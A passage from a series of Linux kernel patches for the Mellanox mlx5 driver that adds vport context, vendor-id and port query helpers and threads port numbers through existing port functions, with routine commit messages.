+ struct mlx5_hca_vport_context *rep) +{ + int out_sz = MLX5_ST_SZ_BYTES(query_hca_vport_context_out); + int in[MLX5_ST_SZ_DW(query_hca_vport_context_in)]; + int is_group_manager; + void *out; + void *ctx; + int err; + + is_group_manager = MLX5_CAP_GEN(dev, vport_group_manager); + + memset(in, 0, sizeof(in)); + out = kzalloc(out_sz, GFP_KERNEL); + if (!out) + return -ENOMEM; + + MLX5_SET(query_hca_vport_context_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_VPORT_CONTEXT); + + if (other_vport) { + if (is_group_manager) { + MLX5_SET(query_hca_vport_context_in, in, other_vport, 1); + MLX5_SET(query_hca_vport_context_in, in, vport_number, vf_num); + } else { + err = -EPERM; + goto ex; + } + } + + if (MLX5_CAP_GEN(dev, num_ports) == 2) + MLX5_SET(query_hca_vport_context_in, in, port_num, port_num); + + err = mlx5_cmd_exec(dev, in, sizeof(in), out, out_sz); + if (err) + goto ex; + err = mlx5_cmd_status_to_err_v2(out); + if (err) + goto ex; + + ctx = MLX5_ADDR_OF(query_hca_vport_context_out, out, hca_vport_context); + rep->field_select = MLX5_GET_PR(hca_vport_context, ctx, 
field_select); + rep->sm_virt_aware = MLX5_GET_PR(hca_vport_context, ctx, sm_virt_aware); + rep->has_smi = MLX5_GET_PR(hca_vport_context, ctx, has_smi); + rep->has_raw = MLX5_GET_PR(hca_vport_context, ctx, has_raw); + rep->policy = MLX5_GET_PR(hca_vport_context, ctx, vport_state_policy); + rep->phys_state = MLX5_GET_PR(hca_vport_context, ctx, + port_physical_state); + rep->vport_state = MLX5_GET_PR(hca_vport_context, ctx, vport_state); + rep->port_physical_state = MLX5_GET_PR(hca_vport_context, ctx, + port_physical_state); + rep->port_guid = MLX5_GET64_PR(hca_vport_context, ctx, port_guid); + rep->node_guid = MLX5_GET64_PR(hca_vport_context, ctx, node_guid); + rep->cap_mask1 = MLX5_GET_PR(hca_vport_context, ctx, cap_mask1); + rep->cap_mask1_perm = MLX5_GET_PR(hca_vport_context, ctx, + cap_mask1_field_select); + rep->cap_mask2 = MLX5_GET_PR(hca_vport_context, ctx, cap_mask2); + rep->cap_mask2_perm = MLX5_GET_PR(hca_vport_context, ctx, + cap_mask2_field_select); + rep->lid = MLX5_GET_PR(hca_vport_context, ctx, lid); + rep->init_type_reply = MLX5_GET_PR(hca_vport_context, ctx, + init_type_reply); + rep->lmc = MLX5_GET_PR(hca_vport_context, ctx, lmc); + rep->subnet_timeout = MLX5_GET_PR(hca_vport_context, ctx, + subnet_timeout); + rep->sm_lid = MLX5_GET_PR(hca_vport_context, ctx, sm_lid); + rep->sm_sl = MLX5_GET_PR(hca_vport_context, ctx, sm_sl); + rep->qkey_violation_counter = MLX5_GET_PR(hca_vport_context, ctx, + qkey_violation_counter); + rep->pkey_violation_counter = MLX5_GET_PR(hca_vport_context, ctx, + pkey_violation_counter); + rep->grh_required = MLX5_GET_PR(hca_vport_context, ctx, grh_required); + rep->sys_image_guid = MLX5_GET64_PR(hca_vport_context, ctx, + system_image_guid); + +ex: + kfree(out); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_context); + +int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, + __be64 *sys_image_guid) +{ + struct mlx5_hca_vport_context *rep; + int err; + + rep = kzalloc(sizeof(*rep), GFP_KERNEL); + if (!rep) + return -ENOMEM; + + err = mlx5_query_hca_vport_context(dev, 0, 1, 0, rep); + if (!err) + *sys_image_guid = rep->sys_image_guid; + + kfree(rep); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_system_image_guid); + +int mlx5_query_hca_vport_node_guid(struct mlx5_core_dev *dev, + u64 *node_guid) +{ + struct mlx5_hca_vport_context *rep; + int err; + + rep = kzalloc(sizeof(*rep), GFP_KERNEL); + if (!rep) + return -ENOMEM; + + err = mlx5_query_hca_vport_context(dev, 0, 1, 0, rep); + if (!err) + *node_guid = rep->node_guid; + + kfree(rep); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_node_guid); diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h index b288c538347a..b2c43508a737 100644 --- a/include/linux/mlx5/device.h +++ b/include/linux/mlx5/device.h @@ -99,6 +99,12 @@ __mlx5_mask(typ, fld)) #define MLX5_GET64(typ, p, fld) be64_to_cpu(*((__be64 *)(p) + __mlx5_64_off(typ, fld))) +#define MLX5_GET64_PR(typ, p, fld) ({ \ + u64 ___t = MLX5_GET64(typ, p, fld); \ + pr_debug(#fld " = 0x%llx\n", ___t); \ + ___t; \ +}) + enum { MLX5_MAX_COMMANDS = 32, MLX5_CMD_DATA_BLOCK_SIZE = 512, @@ -1172,4 +1178,11 @@ enum { MLX5_CMD_STAT_BAD_SIZE_OUTS_CQES_ERR = 0x40, }; +static inline u16 mlx5_to_sw_pkey_sz(int pkey_sz) +{ + if (pkey_sz > MLX5_MAX_LOG_PKEY_TABLE) + return 0; + return MLX5_MIN_PKEY_TABLE_SIZE << pkey_sz; +} + #endif /* MLX5_DEVICE_H */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index ba9f212c94bb..8ab8b8af5c32 100644 --- a/include/linux/mlx5/driver.h +++ 
b/include/linux/mlx5/driver.h @@ -553,6 +553,41 @@ struct mlx5_pas { u8 log_sz; }; +enum port_state_policy { + MLX5_AAA_000 +}; + +enum phy_port_state { + MLX5_AAA_111 +}; + +struct mlx5_hca_vport_context { + u32 field_select; + bool sm_virt_aware; + bool has_smi; + bool has_raw; + enum port_state_policy policy; + enum phy_port_state phys_state; + enum ib_port_state vport_state; + u8 port_physical_state; + u64 sys_image_guid; + u64 port_guid; + u64 node_guid; + u32 cap_mask1; + u32 cap_mask1_perm; + u32 cap_mask2; + u32 cap_mask2_perm; + u16 lid; + u8 init_type_reply; /* bitmask: see ib spec 14.2.5.6 InitTypeReply */ + u8 lmc; + u8 subnet_timeout; + u16 sm_lid; + u8 sm_sl; + u16 qkey_violation_counter; + u16 pkey_violation_counter; + bool grh_required; +}; + static inline void *mlx5_buf_offset(struct mlx5_buf *buf, int offset) { return buf->direct.buf + offset; @@ -792,4 +827,14 @@ struct mlx5_profile { } mr_cache[MAX_MR_CACHE_ENTRIES]; }; +static inline int mlx5_get_gid_table_len(u16 param) +{ + if (param > 4) { + pr_warn("gid table length is zero\n"); + return 0; + } + + return 8 * (1 << param); +} + #endif /* MLX5_DRIVER_H */ diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index dbe2b32c0539..f06d054ad021 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -2221,12 +2221,15 @@ struct mlx5_ifc_hca_vport_context_bits { u8 has_smi[0x1]; u8 has_raw[0x1]; u8 grh_required[0x1]; - u8 reserved_1[0x10]; - u8 port_state_policy[0x4]; - u8 phy_port_state[0x4]; + u8 reserved_1[0xc]; + u8 port_physical_state[0x4]; + u8 vport_state_policy[0x4]; + u8 port_state[0x4]; u8 vport_state[0x4]; - u8 reserved_2[0x60]; + u8 reserved_2[0x20]; + + u8 system_image_guid[0x40]; u8 port_guid[0x40]; @@ -3490,7 +3493,8 @@ struct mlx5_ifc_query_hca_vport_pkey_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x10]; @@ -3519,7 +3523,8 @@ struct mlx5_ifc_query_hca_vport_gid_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x10]; @@ -3545,7 +3550,8 @@ struct mlx5_ifc_query_hca_vport_context_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x20]; @@ -4243,7 +4249,8 @@ struct mlx5_ifc_modify_hca_vport_context_in_bits { u8 op_mod[0x10]; u8 other_vport[0x1]; - u8 reserved_2[0xf]; + u8 reserved_2[0xb]; + u8 port_num[0x4]; u8 vport_number[0x10]; u8 reserved_3[0x20]; diff --git a/include/linux/mlx5/vport.h b/include/linux/mlx5/vport.h index 99d0e9f85432..67882a834efb 100644 --- a/include/linux/mlx5/vport.h +++ b/include/linux/mlx5/vport.h @@ -37,5 +37,19 @@ u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod); void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); +int mlx5_query_hca_vport_gid(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 gid_index, + union ib_gid *gid); +int mlx5_query_hca_vport_pkey(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 pkey_index, + u16 *pkey); +int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, + u8 other_vport, u8 port_num, + u16 vf_num, + struct mlx5_hca_vport_context *rep); +int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, + __be64 *sys_image_guid); +int mlx5_query_hca_vport_node_guid(struct mlx5_core_dev *dev, + u64 *node_guid); 
#endif /* __MLX5_VPORT_H__ */ From 211e6c80e5a68ef39a81484583e8efbf9774627d Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:42 +0300 Subject: [PATCH 713/872] net/mlx5_core: Get vendor-id using the query adapter command Add two wrapper functions to the query adapter command: 1. mlx5_query_board_id -- replaces the old mlx5_cmd_query_adapter. 2. mlx5_core_query_vendor_id -- retrieves the vendor_id from the query_adapter command. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 59 ++++++++++++++----- .../net/ethernet/mellanox/mlx5/core/main.c | 4 +- .../ethernet/mellanox/mlx5/core/mlx5_core.h | 2 +- include/linux/mlx5/driver.h | 1 + include/linux/mlx5/mlx5_ifc.h | 7 ++- 5 files changed, 53 insertions(+), 20 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index 801ccadd709a..ba87442ef776 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -35,34 +35,63 @@ #include #include "mlx5_core.h" -int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev) +int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev, u32 *out, int outlen) { - struct mlx5_cmd_query_adapter_mbox_out *out; - struct mlx5_cmd_query_adapter_mbox_in in; + u32 in[MLX5_ST_SZ_DW(query_adapter_in)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(query_adapter_in, in, opcode, MLX5_CMD_OP_QUERY_ADAPTER); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, outlen); +} + +int mlx5_query_board_id(struct mlx5_core_dev *dev) +{ + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_adapter_out); int err; - out = kzalloc(sizeof(*out), GFP_KERNEL); + out = kzalloc(outlen, GFP_KERNEL); if (!out) return -ENOMEM; - memset(&in, 0, sizeof(in)); - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_QUERY_ADAPTER); - err = mlx5_cmd_exec(dev, &in, sizeof(in), out, sizeof(*out)); + err = mlx5_cmd_query_adapter(dev, out, outlen); if (err) - goto out_out; + goto out; - if (out->hdr.status) { - err = mlx5_cmd_status_to_err(&out->hdr); - goto out_out; - } + memcpy(dev->board_id, + MLX5_ADDR_OF(query_adapter_out, out, + query_adapter_struct.vsd_contd_psid), + MLX5_FLD_SZ_BYTES(query_adapter_out, + query_adapter_struct.vsd_contd_psid)); - memcpy(dev->board_id, out->vsd_psid, sizeof(out->vsd_psid)); - -out_out: +out: kfree(out); + return err; +} + +int mlx5_core_query_vendor_id(struct mlx5_core_dev *mdev, u32 *vendor_id) +{ + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_adapter_out); + int err; + + out = kzalloc(outlen, GFP_KERNEL); + if (!out) + return -ENOMEM; + err = mlx5_cmd_query_adapter(mdev, out, outlen); + if (err) + goto out; + + *vendor_id = MLX5_GET(query_adapter_out, out, + query_adapter_struct.ieee_vendor_id); +out: + kfree(out); return err; } +EXPORT_SYMBOL(mlx5_core_query_vendor_id); int mlx5_query_hca_caps(struct mlx5_core_dev *dev) { diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 58354122dfe4..afad529838de 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -768,9 +768,9 @@ static int mlx5_dev_init(struct mlx5_core_dev *dev, struct pci_dev *pdev) goto err_stop_poll; } - err = mlx5_cmd_query_adapter(dev); + err = mlx5_query_board_id(dev); if (err) { - dev_err(&pdev->dev, "query adapter failed\n"); + dev_err(&pdev->dev, "query board id failed\n"); goto err_stop_poll; } diff --git 
a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h index 6983c1047255..fc88ecaecb4b 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h @@ -78,7 +78,7 @@ static inline int mlx5_cmd_exec_check_status(struct mlx5_core_dev *dev, u32 *in, } int mlx5_query_hca_caps(struct mlx5_core_dev *dev); -int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev); +int mlx5_query_board_id(struct mlx5_core_dev *dev); int mlx5_cmd_init_hca(struct mlx5_core_dev *dev); int mlx5_cmd_teardown_hca(struct mlx5_core_dev *dev); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 8ab8b8af5c32..b90fb9336d21 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -817,6 +817,7 @@ struct mlx5_interface { void *mlx5_get_protocol_dev(struct mlx5_core_dev *mdev, int protocol); int mlx5_register_interface(struct mlx5_interface *intf); void mlx5_unregister_interface(struct mlx5_interface *intf); +int mlx5_core_query_vendor_id(struct mlx5_core_dev *mdev, u32 *vendor_id); struct mlx5_profile { u64 mask; diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index f06d054ad021..6d2f6fee041c 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -2470,9 +2470,12 @@ union mlx5_ifc_cong_control_roce_ecn_auto_bits { }; struct mlx5_ifc_query_adapter_param_block_bits { - u8 reserved_0[0xe0]; + u8 reserved_0[0xc0]; - u8 reserved_1[0x10]; + u8 reserved_1[0x8]; + u8 ieee_vendor_id[0x18]; + + u8 reserved_2[0x10]; u8 vsd_vendor_id[0x10]; u8 vsd[208][0x8]; From e760152d08da78aa160e68ac90bf8f3f10aff462 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:43 +0300 Subject: [PATCH 714/872] net/mlx5_core: Use port number in the query port mtu helpers Extend the function prototypes for max and operational mtu to take the local port number. In the Ethernet driver this is hard-coded to one, since ConnectX4 Ethernet devices are always function-per-port. The IB driver also serves older devices (ConnectIB) which aren't, and hence the port can vary. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. 
Miller --- drivers/net/ethernet/mellanox/mlx5/core/en_main.c | 4 ++-- drivers/net/ethernet/mellanox/mlx5/core/port.c | 15 +++++++++------ include/linux/mlx5/driver.h | 6 ++++-- 3 files changed, 15 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c index edba09cca600..7348c5173aa9 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -1386,7 +1386,7 @@ int mlx5e_open_locked(struct net_device *netdev) return err; } - err = mlx5_query_port_oper_mtu(mdev, &actual_mtu); + err = mlx5_query_port_oper_mtu(mdev, &actual_mtu, 1); if (err) { netdev_err(netdev, "%s: mlx5_query_port_oper_mtu failed %d\n", __func__, err); @@ -1614,7 +1614,7 @@ static int mlx5e_change_mtu(struct net_device *netdev, int new_mtu) int max_mtu; int err = 0; - err = mlx5_query_port_max_mtu(mdev, &max_mtu); + err = mlx5_query_port_max_mtu(mdev, &max_mtu, 1); if (err) return err; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index 7d3d0f9f328d..d9498aae5ab5 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -213,7 +213,8 @@ int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status) } static int mlx5_query_port_mtu(struct mlx5_core_dev *dev, - int *admin_mtu, int *max_mtu, int *oper_mtu) + int *admin_mtu, int *max_mtu, int *oper_mtu, + u8 local_port) { u32 in[MLX5_ST_SZ_DW(pmtu_reg)]; u32 out[MLX5_ST_SZ_DW(pmtu_reg)]; @@ -221,7 +222,7 @@ static int mlx5_query_port_mtu(struct mlx5_core_dev *dev, memset(in, 0, sizeof(in)); - MLX5_SET(pmtu_reg, in, local_port, 1); + MLX5_SET(pmtu_reg, in, local_port, local_port); err = mlx5_core_access_reg(dev, in, sizeof(in), out, sizeof(out), MLX5_REG_PMTU, 0, 0); @@ -253,14 +254,16 @@ int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu) } EXPORT_SYMBOL_GPL(mlx5_set_port_mtu); -int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu) +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu, + u8 local_port) { - return mlx5_query_port_mtu(dev, NULL, max_mtu, NULL); + return mlx5_query_port_mtu(dev, NULL, max_mtu, NULL, local_port); } EXPORT_SYMBOL_GPL(mlx5_query_port_max_mtu); -int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu) +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, + u8 local_port) { - return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu); + return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu, local_port); } EXPORT_SYMBOL_GPL(mlx5_query_port_oper_mtu); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index b90fb9336d21..cd09784b6999 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -751,8 +751,10 @@ int mlx5_set_port_status(struct mlx5_core_dev *dev, int mlx5_query_port_status(struct mlx5_core_dev *dev, u8 *status); int mlx5_set_port_mtu(struct mlx5_core_dev *dev, int mtu); -int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu); -int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu); +int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu, + u8 local_port); +int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, + u8 local_port); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From 
a05bdefa4081d43f9c86c3bb693d0492a21590da Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:44 +0300 Subject: [PATCH 715/872] net/mlx5_core: Use port number when querying port ptys Until now, mlx5_query_port_ptys always queried port number one. Added a new argument to the function's prototype so we can also query the second port. This will be needed when the helper is invoked from the IB driver on non-FPP (Function-Per-Port) devices. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c | 2 +- drivers/net/ethernet/mellanox/mlx5/core/port.c | 8 ++++---- include/linux/mlx5/driver.h | 2 +- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c index de7aec8abca1..388938482ff9 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c @@ -543,7 +543,7 @@ static int mlx5e_get_settings(struct net_device *netdev, u32 eth_proto_oper; int err; - err = mlx5_query_port_ptys(mdev, out, sizeof(out), MLX5_PTYS_EN); + err = mlx5_query_port_ptys(mdev, out, sizeof(out), MLX5_PTYS_EN, 1); if (err) { netdev_err(netdev, "%s: query port ptys failed: %d\n", diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index d9498aae5ab5..cbbce40d853c 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -104,13 +104,13 @@ int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps) EXPORT_SYMBOL_GPL(mlx5_set_port_caps); int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, - int ptys_size, int proto_mask) + int ptys_size, int proto_mask, u8 local_port) { u32 in[MLX5_ST_SZ_DW(ptys_reg)]; int err; memset(in, 0, sizeof(in)); - MLX5_SET(ptys_reg, in, local_port, 1); + MLX5_SET(ptys_reg, in, local_port, local_port); MLX5_SET(ptys_reg, in, proto_mask, proto_mask); err = mlx5_core_access_reg(dev, in, sizeof(in), ptys, @@ -126,7 +126,7 @@ int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, u32 out[MLX5_ST_SZ_DW(ptys_reg)]; int err; - err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask, 1); if (err) return err; @@ -145,7 +145,7 @@ int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, u32 out[MLX5_ST_SZ_DW(ptys_reg)]; int err; - err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask); + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask, 1); if (err) return err; diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index cd09784b6999..e4b814f64014 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -739,7 +739,7 @@ int mlx5_core_access_reg(struct mlx5_core_dev *dev, void *data_in, int mlx5_set_port_caps(struct mlx5_core_dev *dev, u8 port_num, u32 caps); int mlx5_query_port_ptys(struct mlx5_core_dev *dev, u32 *ptys, - int ptys_size, int proto_mask); + int ptys_size, int proto_mask, u8 local_port); int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, u32 *proto_cap, int proto_mask); int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, From a124d13ef59e09941fc0924fd7c29ae6d7cd77a3 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:45 +0300 Subject: [PATCH 716/872] net/mlx5_core: Add more query port helpers Add the following helpers: 1. 
mlx5_query_port_proto_oper -- queries the port operational speed/protocol mask 2. mlx5_query_port_link_width_oper - queries the port link width bitmask 3. mlx5_query_port_vl_hw_cap - queries the Virtual Lanes supported on this port These helpers will be used from the IB driver when working in ISSI > 0 mode. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/port.c | 67 +++++++++++++++++++ include/linux/mlx5/driver.h | 8 +++ 2 files changed, 75 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/port.c b/drivers/net/ethernet/mellanox/mlx5/core/port.c index cbbce40d853c..619d3baf19ea 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/port.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/port.c @@ -158,6 +158,42 @@ int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, } EXPORT_SYMBOL_GPL(mlx5_query_port_proto_admin); +int mlx5_query_port_link_width_oper(struct mlx5_core_dev *dev, + u8 *link_width_oper, u8 local_port) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), MLX5_PTYS_IB, local_port); + if (err) + return err; + + *link_width_oper = MLX5_GET(ptys_reg, out, ib_link_width_oper); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_link_width_oper); + +int mlx5_query_port_proto_oper(struct mlx5_core_dev *dev, + u8 *proto_oper, int proto_mask, + u8 local_port) +{ + u32 out[MLX5_ST_SZ_DW(ptys_reg)]; + int err; + + err = mlx5_query_port_ptys(dev, out, sizeof(out), proto_mask, local_port); + if (err) + return err; + + if (proto_mask == MLX5_PTYS_EN) + *proto_oper = MLX5_GET(ptys_reg, out, eth_proto_oper); + else + *proto_oper = MLX5_GET(ptys_reg, out, ib_proto_oper); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_proto_oper); + int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, int proto_mask) { @@ -267,3 +303,34 @@ int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, return mlx5_query_port_mtu(dev, NULL, NULL, oper_mtu, local_port); } EXPORT_SYMBOL_GPL(mlx5_query_port_oper_mtu); + +static int mlx5_query_port_pvlc(struct mlx5_core_dev *dev, u32 *pvlc, + int pvlc_size, u8 local_port) +{ + u32 in[MLX5_ST_SZ_DW(pvlc_reg)]; + int err; + + memset(in, 0, sizeof(in)); + MLX5_SET(ptys_reg, in, local_port, local_port); + + err = mlx5_core_access_reg(dev, in, sizeof(in), pvlc, + pvlc_size, MLX5_REG_PVLC, 0, 0); + + return err; +} + +int mlx5_query_port_vl_hw_cap(struct mlx5_core_dev *dev, + u8 *vl_hw_cap, u8 local_port) +{ + u32 out[MLX5_ST_SZ_DW(pvlc_reg)]; + int err; + + err = mlx5_query_port_pvlc(dev, out, sizeof(out), local_port); + if (err) + return err; + + *vl_hw_cap = MLX5_GET(pvlc_reg, out, vl_hw_cap); + + return 0; +} +EXPORT_SYMBOL_GPL(mlx5_query_port_vl_hw_cap); diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index e4b814f64014..6093bde16b94 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -107,6 +107,7 @@ enum { MLX5_REG_PUDE = 0x5009, MLX5_REG_PMPE = 0x5010, MLX5_REG_PELC = 0x500e, + MLX5_REG_PVLC = 0x500f, MLX5_REG_PMLP = 0, /* TBD */ MLX5_REG_NODE_DESC = 0x6001, MLX5_REG_HOST_ENDIANNESS = 0x7004, @@ -744,6 +745,11 @@ int mlx5_query_port_proto_cap(struct mlx5_core_dev *dev, u32 *proto_cap, int proto_mask); int mlx5_query_port_proto_admin(struct mlx5_core_dev *dev, u32 *proto_admin, int proto_mask); +int mlx5_query_port_link_width_oper(struct mlx5_core_dev *dev, + u8 *link_width_oper, u8 local_port); +int mlx5_query_port_proto_oper(struct mlx5_core_dev *dev, + u8 
*proto_oper, int proto_mask, + u8 local_port); int mlx5_set_port_proto(struct mlx5_core_dev *dev, u32 proto_admin, int proto_mask); int mlx5_set_port_status(struct mlx5_core_dev *dev, @@ -755,6 +761,8 @@ int mlx5_query_port_max_mtu(struct mlx5_core_dev *dev, int *max_mtu, u8 local_port); int mlx5_query_port_oper_mtu(struct mlx5_core_dev *dev, int *oper_mtu, u8 local_port); +int mlx5_query_port_vl_hw_cap(struct mlx5_core_dev *dev, + u8 *vl_hw_cap, u8 local_port); int mlx5_debug_eq_add(struct mlx5_core_dev *dev, struct mlx5_eq *eq); void mlx5_debug_eq_remove(struct mlx5_core_dev *dev, struct mlx5_eq *eq); From 1b5daf11b015123108686a9060ee6de705a03e76 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:46 +0300 Subject: [PATCH 717/872] IB/mlx5: Avoid using the MAD_IFC command under ISSI > 0 mode In ISSI > 0 mode, most of the MAD_IFC command features are deprecated, and can't be used. Therefore, when in that mode, we replace all of them with other commands that provide the required functionality. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/mad.c | 297 +++++++++++++++ drivers/infiniband/hw/mlx5/main.c | 517 ++++++++++++++++++--------- drivers/infiniband/hw/mlx5/mlx5_ib.h | 16 + 3 files changed, 657 insertions(+), 173 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/mad.c b/drivers/infiniband/hw/mlx5/mad.c index f2d9e70818d7..a770490ebbf1 100644 --- a/drivers/infiniband/hw/mlx5/mad.c +++ b/drivers/infiniband/hw/mlx5/mad.c @@ -137,3 +137,300 @@ int mlx5_query_ext_port_caps(struct mlx5_ib_dev *dev, u8 port) kfree(out_mad); return err; } + +int mlx5_query_mad_ifc_smp_attr_node_info(struct ib_device *ibdev, + struct ib_smp *out_mad) +{ + struct ib_smp *in_mad = NULL; + int err = -ENOMEM; + + in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); + if (!in_mad) + return -ENOMEM; + + init_query_mad(in_mad); + in_mad->attr_id = 